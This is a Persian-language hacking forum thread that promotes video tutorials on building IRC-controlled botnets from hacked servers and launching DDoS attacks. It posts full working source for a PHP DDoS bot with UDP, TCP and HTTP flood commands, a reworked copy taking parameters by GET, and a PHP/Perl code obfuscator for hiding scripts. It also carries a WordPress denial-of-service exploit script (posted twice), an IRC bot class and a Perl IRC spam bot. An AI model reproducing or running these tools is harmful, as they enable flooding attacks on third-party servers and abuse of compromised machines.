- Thunderbird
- Nokia Phones : Nokia N95 (Symbian OS v.9.2),Nokia N82, Nokia N810 Internet Tablet
- Aigo P8860 (Browser hangs and cannot be restarted)
- Siemens phones
- Google T-Mobile G1 TC4-RC30
- Ubuntu (Operating system sometimes reboots, memory management failure)
- possibly more devices and products that support Javascript,

همچنین برای پچ کردن این باگ از متن زیر استفاده کنید

- Mozilla : Fixed in Firefox 3.0.5 and 2.0.0.19
[Only registered and activated users can see links]
- Apple iPhone&iPod : patched
- IE : No patch for IE5, IE6, IE7, IE8 until IE9
- Webkit : Patched in r41741 - [Only registered and activated users can see links]
- Chrome : Patched, unknown which version)
- Opera : Patched after version 9.64
- Thunderbird (unknown)
- Konqueror : unknown (did not respond)
- Nokia : unknown, opened a case but never came back
- Aigo P8860 : unknown
- Siemens : unknown
- Others ? Find out by visiting the POC at

همچنین شما می تونید این رو همین الان تست کنید

[Only registered and activated users can see links]

و سورسش هم دانلود کنید

تشکر

سلام به تمامی دوستان در اشیانه !

بعد از صحبت با مدیران تصمیم گرقتم که یه تاپیک با نام اموزش های تصویری Botnet و DDos + اسکریپت ایجاد کنم و تا انجایی که علمم میرسه در این رابطه بحث کنم !

که البته از دوستان هم خواهشمندم که اگه متد و یا ... در این رابطه دارن قرار بدن ! تا مرجع کاملی بشه !

از دوستان خواهشمندم که Smap نکنند ! و اگه سوالی دارن در پیغام خصوصی مطرح کنن !

اولین اموزش هم در رابطه با Botnet هست که اگه استقبال شد سعی میکنم به بهترین نحوه بسازمش !

سرفصل های اولین اموزش هم !

1 - نحوه کانکت شدن به IRC .

2 - نحوه ایجاد کانال های IRC برای Botnet و چت !

3 - نحوه اماده سازی Botnet برای join شدن و استفاده !

4 - نحوه اماده سازی سرور های هک شده .

5 - نحوه اجرای اسکریپت در سمت سرور !

6 - نحوه دادن دستور حمله به سرور ها در IRC !

thanks دادن نشانه راضایت شما از این تاپیک و دلگرمی من واسه ادامه هست !

سلام دوستان !

خوب اولین قسمت اموزش با عنوان نحوه کانکت شدن به IRC و نحوه ایجاد کانال های IRC برای Botnet و چت اماده شد !

سعی میکنم در اسرع وقت بقیه رو هم اماده کنم ! (اخه یه جورایی فصل امتحانات دانشگاهه:mad:)

سلام دوستان !

خوب به سلامتی پارت دوم اموزش Botnet هم اماده شد !

در این پارت با :

1 - نحوه اماده سازی Botnet برای join شدن و استفاده !

2 - نحوه اماده سازی سرور های هک شده .

اشنا میشید ! در کل درس راحتی هست !

توصیه میشه حتما ببینید !

هر کاری کردم اتچ نشد ! مدیران لطف کنن اتچ کنن تا یه وقت لینک پاک نشه !


[Only registered and activated users can see links]

سلام دوستان !

مثل اینکه استقبالی از تاپیک نشده ! که تا حالا نه کسی سوالی پرسیده (pm) ! نه تشکر .. شده ! و نه درخواستی شده !

این چند تا دلیل داره ! یا شما همه این متد رو بلدید ! که اگه بلدید بگید من وقت خودمو تلف نکنم !

یا هم بلد نیستید و روتون نمیشه چیزی بگید ! و منتظر بقیه هستید !

مطمعا باشد با این رودربایستی ها چیزی درست نمیشه !

مثلا اگه یه مدیر یه سوال بپرسه براش افت داره و حاضر یاد نگیره ولی سوالشو نپرسه ! و این خوب نیست !

سلام دوستان !

خوب به سلامتی پارت دوم اموزش Botnet هم اماده شد !

در این پارت با :

1 - نحوه اماده سازی Botnet برای join شدن و استفاده !

2 - نحوه اماده سازی سرور های هک شده .

اشنا میشید ! در کل درس راحتی هست !

توصیه میشه حتما ببینید !

هر کاری کردم اتچ نشد ! مدیران لطف کنن اتچ کنن تا یه وقت لینک پاک نشه !


[Only registered and activated users can see links]


اپلود شد !

(دوستان پست نمي دن كه شما راحت كارت رو ادامه بدي heart

سلام دوستان !

به سلامتی اموزش Botnet من با این کلیپ تمام میشه !

البته Botnet این فقط یه رشته اونه! و کلی متد داره ! و قصد من فقط این بود تا با نحوه کلی این حملات اشنا بشین !

و بدونید چطور باید از اسکریپت های پاپلیک Botnet استفاده کنید ! و با IRC ها اشنا بشید !

در این درس که درس اخر Botnet است شما علاوه بر اموزش های پست های بالا به صورت کامل با نحوه انجام این حملات اشنا میشوید !

یعنی !

1 - نحوه کانکت شدن به IRC .

2 - نحوه ایجاد کانال های IRC برای Botnet و چت !

3 - نحوه اماده سازی Botnet برای join شدن و استفاده !

4 - نحوه اماده سازی سرور های هک شده .

5 - نحوه اجرای اسکریپت در سمت سرور !

6 - نحوه دادن دستور حمله به سرور ها در IRC !

همه و همه در این فیلم !

این فیلم رو حتما ببینید ! چون تمامی مطالب بالا رو یک جا داره !

در پست های بعدی سعی میکنم اسکریپت هایی برای این حمله قرار بدم و انشاالله بریم سراغ اموزش های DDOS !

و اگه زنده بودم برنامه نویسی این حملات !

سلام دوستان ! امیدوارم از اموزش ها لذت برده باشید ! و ما رو هم دعا کنید !

تو این پست برنامه mIRC رو براتون میزارم !

mIRC = برنامه ای برای ارتباط و مدیریت کانال های IRC است !

در تمامی فیلم های بالا من از این برنامه برای ساخت و مدیریت کانال های IRC استفاده میکردم ! که 100% لازمتون میشه !

سلام به تمامی دوستان اشیانه !

امروز براتون اسکریپت PHP DDoS Bot رو که تو فیلم های بالا ازش استفاده میکردم رو اوردم !

امیدوارم کامل یاد گرفته باشید ! (چون جایی دیگه جز اشیانه این چیزا گیرتون نمیاد)!


<?php
/*
PHP DDoS Bot
Version 1.0
Use:
- Open mIRC (download: mirc.com)
- Upload php_ddos_bot.php to your web server
- Go to

[Only registered and activated users can see links]

- Bot will join #yourchannel
- PM the bot saying "ddos-udp IPHERE"
- Enjoy.

*/


$server="irc.freenode.net";
$Port="6667";
$nick="bot-";$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$Channel="#persiannetworks";
$Channelpass="";
$msg="shast";

set_time_limit(0);
$loop = 0; $verbonden = 0;
$verbinden = fsockopen($server, $Port);

while ($read = fgets($verbinden,512)) {

$read = str_replace("\n","",$read); $read = str_replace("\r","",$read);
$read2 = explode(" ",$read);

if ($loop == 0) {
fputs($verbinden,"nick $nick$nicknummer\n\n");
fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
}

if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); }

if ($read2[1] == 251) {
fputs($verbinden,"join $Channel $Channelpass\n");
$verbonden++;
}


if (eregi("bot-op",$read)) {
fputs($verbinden,"mode $Channel +o $read2[4]\n");
}


if (eregi("bot-deop",$read)) {
fputs($verbinden,"mode $Channel -o $read2[4]\n");
}

if (eregi("bot-quit",$read)) {
fputs($verbinden,"quit :$msg\n\n");
break;
}

if (eregi("bot-join",$read)) {
fputs($verbinden,"join $read2[4]\n");
}

if (eregi("bot-part",$read)) {
fputs($verbinden,"part $read2[4]\n");
}


if (eregi("ddos-udp",$read)) {
fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
$fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
if (!$fp)
{
//echo "$errstr ($errno)<br>\n"; //troep
exit;
}
else
{
$char = "a";
for($a = 0; $a < 9999999999999; $a++)
$data = $data.$char;

if(fputs ($fp, $data) )
fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
else
fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
}
}

if (eregi("ddos-tcp",$read)) {
fputs($verbinden,"part $read2[4]\n");
fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
$server = $read2[4];
$Port = $read2[5];

for($sockets = 0; $sockets < $read2[6]; $sockets++)
{
$verbinden = fsockopen($server, $Port);
}
}

if (eregi("ddos-http",$read)) {
fputs($verbinden,"part $read2[4]\n");
fputs($verbinden,"privmsg $Channel :ddos-http - [Only registered and activated users can see links]$read2[4]:$read2[5] $read2[6] times\n\n");
$Webserver = $read2[4];
$Port = $read2[5];

$Aanvraag = "GET / [Only registered and activated users can see links]";
$Aanvraag .= "Accept: */*\r\n";
$Aanvraag .= "Accept-Language: nl\r\n";
$Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
$Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$Aanvraag .= "Host: $read2[4]\r\n";
$Aanvraag .= "Connection: Keep-Alive\r\n\r\n";

for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
{
$DoS = fsockopen($Webserver, $Port);
fwrite($DoS, $Aanvraag);
fclose($DoS);
}
}
$loop++;

}
?>

<?
// PHP OBFUSCATOR
// (C)2003 Richard Fairthorne -- [Only registered and activated users can see links]
// --------------------------
// Permission is granted to disctibute this file UNMODIFIED from its original
// form. All other rights are reserved.

function splitByNewline($string, $length) {
while (strlen($string)>0) {
$newstring.=substr($string, 0, $length) . "\n";
$string=substr($string, $length);
}
return $newstring;
}

echo "<big><b>Free Code Obfuscator (PHP, PERL)</b></big><br>By <a href='[Only registered and activated users can see links]'>Richard Fairthorne</a><hr>";

$b64_input=stripslashes($b64_input);
switch($b64_action) {
case "perl_encode":
$output=$b64_input;
$output=base64_encode($output);
$output=splitByNewline($output,40);
$output="#!/usr/bin/perl\nuse MIME::Base64;\neval(decode_base64('\n$output'));";

$ilength=strlen($b64_input);
$olength=strlen($output);

?>
<table border=0 width=100%><tr><td valign=top>
<textarea rows=18 cols=60 name=done><?=$output;?></textarea>
</td><td valign=top>
<b>PERL code obfuscated!</b><br><br>

Your PERL code has been obfuscated.
<br><br>
<font color=maroon>
Obfuscation-Strength: Normal (Fast code execution)<br>
Compatibility: 100% Code compatibility<br>
Input Length: <?=$ilength;?><br>
Output Length: <b><?=$olength;?></b><br>
</font>
<br>
To use the code, simply cut and paste it in place of the old code. You may need to update the perl path.
It is important to understand that code obfuscation can act as a deterrant, but is not a replacement
for encryption.<br><br>

<a href='?'>Click here</a> to obfuscate another page.
</td></tr></table>
<?
break;
case "php_encode":
$output=$b64_input;
$output=gzdeflate("?>".$output."<?",9);
$output=base64_encode($output);
$output=splitByNewline($output,40);
$output="<? eval(gzinflate(base64_decode('\n$output'))); ?>";

$ilength=strlen($b64_input);
$olength=strlen($output);

?>
<table border=0 width=100%><tr><td valign=top>
<textarea rows=18 cols=60 name=done><?=$output;?></textarea>
</td><td valign=top>
<b>PHP code obfuscated!</b><br><br>

Your PHP code has been obfuscated.
<br><br>
<font color=maroon>
Obfuscation-Strength: Normal (Fast code execution)<br>
Compatibility: Zlib Required. 100% Code compatibility<br>
Input Length: <?=$ilength;?><br>
Output Length: <b><?=$olength;?></b><br>
</font>
<br>
To use the code, simply cut and paste it in place of the old code.
It is important to understand that code obfuscation can act as a deterrant, but is not a replacement
for encryption.<br><br>

<a href='?'>Click here</a> to obfuscate another page.
</td></tr></table>
<?
break;
case "php_encode_hi":
$output=$b64_input;
for ($b64_counter=0; $b64_counter<10; $b64_counter++) {
$output=gzdeflate("?>".$output."<?",9);
$output=base64_encode($output);
$output="<? eval(gzinflate(base64_decode('$output'))); ?>";
}
$output=gzdeflate("?>".$output."<?",9);
$output=base64_encode($output);
$output="<? eval(gzinflate(base64_decode('\n$output'))); ?>";

$ilength=strlen($b64_input);
$olength=strlen($output);

?>

<table border=0 width=100%><tr><td valign=top>
<textarea rows=18 cols=60 name=done><?=$output;?></textarea>
</td><td valign=top>
<b>PHP code obfuscated!</b><br><br>

Your PHP code has been obfuscated.
<br><br>
<font color=maroon>
Obfuscation-Strength: Trecherous (Best Protection)<br>
Compatibility: Zlib Required. 100% Code Compatibility.<br>
Input Length: <?=$ilength;?><br>
Output Length: <b><?=$olength;?></b><br>
</font>
<br>
To use the code, simply cut and paste it in place of the old code.
It is important to understand that code obfuscation can act as a deterrant, but is not a replacement
for encryption.<br><br>

<a href='?'>Click here</a> to obfuscate another page.
</td></tr></table>
<?
break;
// case "decode":
// $output=htmlentities(base64_decode($b64_input),ENT _QUOTES);
// break;
default:
?>
<table border=0 width=100%><tr><td valign=top>
<form method=post>
<textarea name=b64_input cols=60 rows=16></textarea><br>
<SELECT name=b64_action>
<OPTION value='php_encode'>PHP - Normal Strength - Compressed</OPTION>
<OPTION value='php_encode_hi'>PHP - Trecherous Strength - Compressed</OPTION>
<OPTION value='perl_encode'>PERL - Normal Strength</OPTION>
</SELECT>
<input type=submit name=submit value='obfuscate'>
<!-- <input type=submit name=b64_action value=decode> -->
</form>
</td><td valign=top>
<b>Free Code obfuscator</b><br><br>

If you would like a quick way to hide your php code from prying eyes, try this PHP code obfuscator.<br><br>Copy an entire PHP page, into the obfuscator, and it will return a code that also works on any PHP server, but is not human readable.<br><br>

With code 5k or bigger, you may notice that the obfuscated code is smaller than the original code. You can thank me later.
</td></tr></table>
<?
break;
}
?>

با کد بالا می تونید کد های پی اچ پی رو به صورت کد شده در بیارید...
اما داینامیک گرفتن اطلاعات:

شما به این روشی که دوستمون تو فیلمش نشون داد هر دفعه باید برید اسکریپت رو ادیت کنید ...(یک کار غیر منطقی و نا امن...) ولی می تونید بات رو به صورتی کد بزنید که هر دفعه با متود پست نام سرور / آدرس / nick name و... رو بگیره و خودش وصل بشه...
و یک کد بزنید که به صورت اتوماتیک با یک حلقه بات ها رو وصل کنه به آی آر سی و به صورت رندوم بهشون اسم بده... محاسن:سرعت بیشتر .../ امنیت بیشتر ...

اینی که می فرمایین کدش هست؟ یا باید نوشته بشه؟
سلام خب این کدو باید چی جوری بنویسیم؟ از کجا گیر بیاریم

<?php
/*
PHP DDoS Bot
Version 1.0
Use:
- Open mIRC (download: mirc.com)
- Upload php_ddos_bot.php to your web server
- Go to

[Only registered and activated users can see links]

- Bot will join #yourchannel
- PM the bot saying "ddos-udp IPHERE"
- Enjoy.

*/

if(isset($_GET['server'])) {

$server=$_GET['server'];
$Port=$_GET['Port'];
$nick=$_GET['nick'];
$Channel=$_GET['Channel'];
$Channelpass=$_GET['Channelpass'];

$willekeurig;
$willekeurig=mt_rand(0,3);
$nicknummer=mt_rand(100000,999999);
$msg="shast";

set_time_limit(0);
$loop = 0; $verbonden = 0;
$verbinden = fsockopen($server, $Port);

while ($read = fgets($verbinden,512)) {

$read = str_replace("\n","",$read); $read = str_replace("\r","",$read);
$read2 = explode(" ",$read);

if ($loop == 0) {
fputs($verbinden,"nick $nick$nicknummer\n\n");
fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
}

if ($read2[0] == "PING") { fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n"); }

if ($read2[1] == 251) {
fputs($verbinden,"join $Channel $Channelpass\n");
$verbonden++;
}


if (eregi("bot-op",$read)) {
fputs($verbinden,"mode $Channel +o $read2[4]\n");
}


if (eregi("bot-deop",$read)) {
fputs($verbinden,"mode $Channel -o $read2[4]\n");
}

if (eregi("bot-quit",$read)) {
fputs($verbinden,"quit :$msg\n\n");
break;
}

if (eregi("bot-join",$read)) {
fputs($verbinden,"join $read2[4]\n");
}

if (eregi("bot-part",$read)) {
fputs($verbinden,"part $read2[4]\n");
}


if (eregi("ddos-udp",$read)) {
fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
$fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
if (!$fp)
{
//echo "$errstr ($errno)<br>\n"; //troep
exit;
}
else
{
$char = "a";
for($a = 0; $a < 9999999999999; $a++)
$data = $data.$char;

if(fputs ($fp, $data) )
fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
else
fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
}
}

if (eregi("ddos-tcp",$read)) {
fputs($verbinden,"part $read2[4]\n");
fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
$server = $read2[4];
$Port = $read2[5];

for($sockets = 0; $sockets < $read2[6]; $sockets++)
{
$verbinden = fsockopen($server, $Port);
}
}

if (eregi("ddos-http",$read)) {
fputs($verbinden,"part $read2[4]\n");
fputs($verbinden,"privmsg $Channel :ddos-http - [Only registered and activated users can see links]$read2[4]:$read2[5] $read2[6] times\n\n");
$Webserver = $read2[4];
$Port = $read2[5];

$Aanvraag = "GET / [Only registered and activated users can see links]";
$Aanvraag .= "Accept: */*\r\n";

$Aanvraag .= "Accept-Language: nl\r\n";
$Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
$Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
$Aanvraag .= "Host: $read2[4]\r\n";
$Aanvraag .= "Connection: Keep-Alive\r\n\r\n";

for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
{
$DoS = fsockopen($Webserver, $Port);
fwrite($DoS, $Aanvraag);
fclose($DoS);
}
}
$loop++;
}
} else {
print "<html>
<body>
<form method = 'get' >
Server: <input type = 'text' name = 'server' /><br />
Port: <input type = 'text' name = 'Port' /><br />
Nickname: <input type = 'text' name = 'nick' /><br />
Channel: <input type = 'text' name = 'Channel' /><br />
Channelpass: <input type = 'text' name = 'Channelpass' /><br />
<input type = submit >
</form>
</body>
</html>
";
}
?>

فقط تستش نکردم ... خودتون یه تست بزنید اگه اشکال داره بگید ...
--------------------
یه سوتی کوچیک داشت ،اصلاح شد ...

سلام دوستان !

در مورد DOs , DDOS اگه بخوایی بدونی من مقاله نوشته شده توسط اشیانه رو پیشنهاد میکنم !

در مورد Botnet هم یه جورایی نمونه قدرتمند تر از DDos هست که با استفاده از Zombie ها(سرور های هک شده) شما میتونید این حمله رو انجام بدید ! به این صورت که همه Zombie ها رو جمع میکنید یه جا و در ان واحد دستور حمله میدید !

در مورد join کردن همه سرور ها در یک زمان هم سعی میکنم یه تولز واسش بنویسم ! که با تمام Zombie ه در ارتباط باشه و ادیت ها رو در ان واحد انجام بده ! و دستور حمله رو هم توسط همون تولز بدید !

همونطور که تو پست اول گفتم خواهشا Spam نکنید !

مثال:
sh WPd0s.sh --host [Only registered and activated users can see links] --requests 10000

#!/bin/bash
#
# Copyright (C) 2009 Emanuele Gentili < [Only registered and activated users can see links] >
#
# This program is released under the terms of the GNU General Public License
# (GPL), which is distributed with this software in the file "COPYING".
# The GPL specifies the terms under which users may copy and use this software.
#
# WPd0s.sh
# This is a 0day DOS issue for Wordpress Core that use cache stressing with random
# parameter on multiple requests.
#

show_help(){
echo ""
echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " --usage show the exploit Usage"
echo " --prereq show the exploit Prerequisites"
echo " --credits show the exploit Credits"
echo " --help show the Help"
echo ""
echo "Emanuele Gentili <[Only registered and activated users can see links]>"
}

show_credits(){
echo ""
echo " Emanuele 'emgent' Gentili"
echo " [Only registered and activated users can see links]"
echo " emgent @ backtrack.it"
echo ""
}

show_prereq(){
echo ""
echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " Prerequeisites:"
echo " Bash (yeah because is cool.)"
echo " Curl"
echo ""
echo " Emanuele Gentili <[Only registered and activated users can see links]>"
}

show_usage(){
echo ""
echo " 2009 (C) WPd0s.sh - 0day Wordpress DOS <= 2.9"
echo ""
echo " usage $0 --host [Only registered and activated users can see links] --requests 1000"
echo ""
echo " Emanuele Gentili <[Only registered and activated users can see links]>"
}


# Bash
while [[ $# != 0 ]]; do
arg_name=$1; shift
case "$arg_name" in
--help|-?|-h) show_help; exit 0;;
--credits) show_credits; exit 0;;
--usage) show_usage; exit 0;;
--prereq) show_prereq; exit 0;;
--host) host=$1; shift;;
--requests) requests=$1; shift;;
*) echo "invalid option: $1"; show_help;exit 1;;
esac
done

[ -z "$host" ] && { show_help; exit 1; }

for random in `seq 1 $requests`; do
curl -A Firefox -o --url "$host/?cat=2&d0s=1&d0s=$random" > /dev/null 2>&1 &
done

# 2009-12-30 enJoy.

مثال:
sh wpd0s.sh --host [Only registered and activated users can see links] --requests 10000

#!/bin/bash
#
# copyright (c) 2009 emanuele gentili < [Only registered and activated users can see links] >
#
# this program is released under the terms of the gnu general public license
# (gpl), which is distributed with this software in the file "copying".
# the gpl specifies the terms under which users may copy and use this software.
#
# wpd0s.sh
# this is a 0day dos issue for wordpress core that use cache stressing with random
# parameter on multiple requests.
#

show_help(){
echo ""
echo " 2009 (c) wpd0s.sh - 0day wordpress dos <= 2.9"
echo ""
echo " --usage show the exploit usage"
echo " --prereq show the exploit prerequisites"
echo " --credits show the exploit credits"
echo " --help show the help"
echo ""
echo "emanuele gentili <[Only registered and activated users can see links]>"
}

show_credits(){
echo ""
echo " emanuele 'emgent' gentili"
echo " [Only registered and activated users can see links]"
echo " emgent @ backtrack.it"
echo ""
}

show_prereq(){
echo ""
echo " 2009 (c) wpd0s.sh - 0day wordpress dos <= 2.9"
echo ""
echo " prerequeisites:"
echo " bash (yeah because is cool.)"
echo " curl"
echo ""
echo " emanuele gentili <[Only registered and activated users can see links]>"
}

show_usage(){
echo ""
echo " 2009 (c) wpd0s.sh - 0day wordpress dos <= 2.9"
echo ""
echo " usage $0 --host [Only registered and activated users can see links] --requests 1000"
echo ""
echo " emanuele gentili <[Only registered and activated users can see links]>"
}


# bash
while [[ $# != 0 ]]; do
arg_name=$1; shift
case "$arg_name" in
--help|-?|-h) show_help; exit 0;;
--credits) show_credits; exit 0;;
--usage) show_usage; exit 0;;
--prereq) show_prereq; exit 0;;
--host) host=$1; shift;;
--requests) requests=$1; shift;;
*) echo "invalid option: $1"; show_help;exit 1;;
esac
done

[ -z "$host" ] && { show_help; exit 1; }

for random in `seq 1 $requests`; do
curl -a firefox -o --url "$host/?cat=2&d0s=1&d0s=$random" > /dev/null 2>&1 &
done

# 2009-12-30 enjoy.

مبشه در مورد کارایش و نحوه و هرچی هست یه راهنمایی و توضیح بدید ممنون میشم مرسی از شما

برای اشنایی با حملات DOS یا تکذیب سرویس

هم سرچ کن هم این رو نگاه کن

[Only registered and activated users can see links]

این یه اکسپلویت برای Ddos کردن هسته وردپرس هست که با تکیه به cache stressing و با استفاده از پارامترهای تصادفی در درخواست های متعدد حمله رو انجام میده . نحوه استفادش بسیار ساده است و Usage رو تو کد اولی گذاشتم ..

سلام دوستان !

امروز براتون یه اسکریپت Botnet اوردم که یه جورایی Mysql مختل میکنه !

امیدوارم راضی باشین !


<?php
/*
* Bot Class v0.3
* By pyr0t3chnician [at] gmail.com
* VIEW README AT [Only registered and activated users can see links]
* Sample bot script at [Only registered and activated users can see links]
* Change the file extension of both to .php to make them work.
*/
class bot{
var $BotName="MrBot";
var $BotNick="MrBot";
var $BotPass="password";
var $BotOperPass="operpassword";
var $AdminName="pyr0t3chnician";
var $AdminEmail="[Only registered and activated users can see links]";
var $AdminHostMask="[Only registered and activated users can see links]";
var $IrcHost="zeroirc.info";
var $IrcPort=6667;
var $IrcChan="#zeroidentity";
private $IrcSock;
var $Line; // entire line
var $LastSpeaker; // last person to join or speak
var $LastHow; // how the info was received (JOIN, NOTIFY, PRIVMSG)
var $LastWhere; // Where (PM or Channel)
var $LastMessage; // The entire message that was said
var $LastCommand; // The first word that they said
var $LastArgs; // The rest of the words after the first word (!say hello <- hello is args)
var $LastHost;
var $LastHostMask;
var $LastBrowser;
var $MySQLHost="localhost";
var $MySQLUser;
var $MySQLPass;
var $MySQLDB;
private $MySQLCon;
private $Commands = array();
private $EventCommands = array();
function _construct()
{
set_time_limit( 0 );
}
function OpenConnection($host='',$channel='',$port=0)//Opens connection and starts the bot.
{
if($host!='')
$this->IrcHost=$host;
if($channel!='')
$this->IrcChan=$channel;
if($port!=0)
$this->IrcPort=$port;
$this->IrcSock=fsockopen($this->IrcHost,$this->IrcPort, $errorNo, $errorStr );
if($this->IrcSock)
{
fputs( $this->IrcSock, "USER " . $this->BotNick . " " . $this->BotNick . " *: " . $this->BotName . "\r\n" );
fputs( $this->IrcSock, "NICK " . $this->BotNick . "\r\n" );
$this->ConnectionLoop();
}else
die( "Unable to connect to " . $this->IrcHost . " on port " . $this->IrcPort . "\r\nError number: " . $errorNo . "\r\nError message: " . $errorStr . "\r\n" );
}
private function ConnectionLoop()
{
while(!feof($this->IrcSock))
{
$this->Line=fgets($this->IrcSock, 4096);
echo $this->Line;
$this->Line = trim($this->Line);
eregi( "^:(.*)!", $this->Line, $matches );
$this->LastSpeaker = $matches[1];
$this->Output("JOIN", $this->IrcChan,'');
if( ereg( "PING :(.*)", $this->Line, $pong ) )
$this->Output("PONG",$pong[1],'');
if( eregi( "^:(.*)!(.*)@(.*) PRIVMSG " . $this->BotNick . " :" . chr( 1 ) . "VERSION" . chr( 1 ), $this->Line, $matches ) )
$this->Output("NOTICE", $this->LastSpeaker, chr( 1 )."Version: 1.3.3.7".chr( 1 ));
$this->ParseLine();
$this->ExecuteCommand();
$this->ExecuteEventCommand();
$this->LastCommand='';
$this->Line='';
}
}
function Output($type, $who, $message) // Outputs ANY command
{
fputs($this->IrcSock,$type." ".$who." :".$message."\r\n");
}
private function ParseLine()
{
if( eregi( "^:(.*)!(.*)@(.*) (.*) (.*) :(.*)$", $this->Line, $matches ) )
{
$this->LastSpeaker=$matches[1];
$this->LastBrowser=$matches[2];
$this->LastHost=$matches[3];
$this->LastHostMask=$matches[2]."@".$matches[3];
$this->LastHow=$matches[4];
$this->LastWhere=$matches[5];
$this->LastMessage=$matches[6];
$com=explode(" ",$matches[6]);
$this->LastCommand=$com[0];
$args='';
for($a=1;$a<count($com);$a++)
{
if($a!=1)
$args.=" ".$com[$a];
else
$args=$com[$a];
}
$this->LastArgs=$args;
}
}
function AddCommand($command,$function) // Adds a regular command (any expression, only the first word they type
{
$this->Commands[count($this->Commands)]["String"]=$command;
$this->Commands[count($this->Commands)-1]["Function"]=$function;
}
private function ExecuteCommand()
{
foreach($this->Commands as $command)
{
if($this->LastCommand==$command["String"])
{
$execute=$command["Function"];
$execute($this);
}
}
}
function AddEventCommand($action,$function) // Adds an EventCommand
{
$this->EventCommands[count($this->EventCommands)]["String"]=$action;
$this->EventCommands[count($this->EventCommands)-1]["Function"]=$function;
}
private function ExecuteEventCommand()
{
foreach($this->EventCommands as $command)
{
if(strpos($this->Line,$command["String"])!==false)
{
$execute=$command["Function"];
$execute($this);
}
}
}
function BasicOutput($string)
{
fputs($this->IrcSock,$string."\r\n");
}
function BotQuery($string){
$this->MySQLCon = mysql_connect($this->MySQLHost,$this->MySQLUser,$this->MySQLPass);
if (!$this->MySQLCon)
{
die('Could not connect: ' . mysql_error());
}
mysql_select_db($this->MySQLDB,$this->MySQLCon);
mysql_query($string);
mysql_close($this->MySQLCon);
}
function BotReturnArray($string){
$this->MySQLCon = mysql_connect($this->MySQLHost,$this->MySQLUser,$this->MySQLPass);
if (!$this->MySQLCon)
{
die('Could not connect: ' . mysql_error());
}
mysql_select_db($this->MySQLDB,$this->MySQLCon);
$result = mysql_query($string);
if(mysql_num_rows($result)>1)
{
$count=0;
while($row=mysql_fetch_array($result))
{
$return[$count]=$row;
$count++;
}
}else
$return[0]=mysql_fetch_array($result);
mysql_close($this->MySQLCon);
return $return;
}
function BotReturnCount($string){
$this->MySQLCon = mysql_connect($this->MySQLHost,$this->MySQLUser,$this->MySQLPass);
if (!$this->MySQLCon)
{
die('Could not connect: ' . mysql_error());
}
mysql_select_db($this->MySQLDB,$this->MySQLCon);
$result = mysql_query($string);
$count = mysql_num_rows($result);
mysql_close($this->MySQLCon);
return $count;
}
}
?>

اسکریپت Spam Bot !

for sending message which works in a for loop


#!/usr/bin/perl
#
#ircbot <= 0.01 irc spam bot
#
#© 2004-2006 Esoteric Code
#simple spam bot for irc. has a timer
#for sending message which works in a for loop
#written by: seven


use IO::Socket;
$channel ="#channel name";
$Host = "irc.server.net";
$Port = 6667;
$nick = "seven";
$email = "code 8 * :esotericcode.com";

@alternate = ('amen_Ra',
'seven',
'basic_code');

@resp = ('I am a IRC bot coded in perl.', #random spam messages
'visit [Only registered and activated users can see links]',
'hey, how are you.',
'esoteric code.com.',
'how was your day?',
'hey, blow me',
'i am sexier than you');


my $sock = new IO::Socket::INET(
PeerAddr => $Host,
PeerPort => $Port,
Proto => 'tcp',
) || die "No connection $!\n";

print $sock "NICK $nick\r\n";
print $sock "USER $email\r\n";

while ($input = <$sock>)
{
if ($input =~ /004/){
last;
}
elsif ($input =~ /433/){
#nick already taken, auto switch to an alternate randomly from list
$a = int(rand($#alternate));
$newnick = $alternate[$a];
print $sock "NICK $newnick\r\n";
}

}
print $sock "JOIN $channel\r\n";

while ($input = <$sock>)
{
chop $input;
if ($input =~/^PING(.*)$/i){
print $sock "PONG $1\r\n";
print $sock "PRIVMSG $channel :irc bot coded in perl -> [Only registered and activated users can see links]";
}

elsif ($input =~/!start(.*)/){

for ($i = 0; $i < 20; ++$i)
{
$r = int(rand($#resp));
$message = $resp[$r];
print $sock "PRIVMSG $channel :$message\r\n";
sleep(10)
}

}
elsif ($input =~/!time(.*)/){
$time = time();
print $sock "PRIVMSG $channel :local time/date: $time\r\n";
}
else{
#@tmp = split(/:/, $input);
print $input #$tmp[1]
}

}

سلام دوستان !

امروز یه برنامه کوچیک با Perl براتون نوشتم که یه جورایی به روبات شبیه ! فقط واسه اشنایی دوستان با نحوه کانکت شدن به IRC و نحوه کار با اون !


#!/usr/bin/perl
# Simple IRC Bot.
# Coded by: Saime.
# Options: !version , !killmaself , !op , !owner
# Visit us: irc.nitrousirc.net #perl
use strict;
use IO::Socket;
use Socket;
my $server = "irc.abjects.net";
my $port= '7000';
my $chanel = "#ash";
my $nick = "King`Of`Cair3x";
my $identify = "ohi";
my $name = "Hithere";
my $saime = "Saime";
my $socket = new IO::Socket::INET(PeerAddr => $server, PeerPort => $port, Proto => "tcp") or die "Get a life ?";
print $socket "NICK $nick\r\n";
print $socket "USER $identify 8 * :$name\r\n";
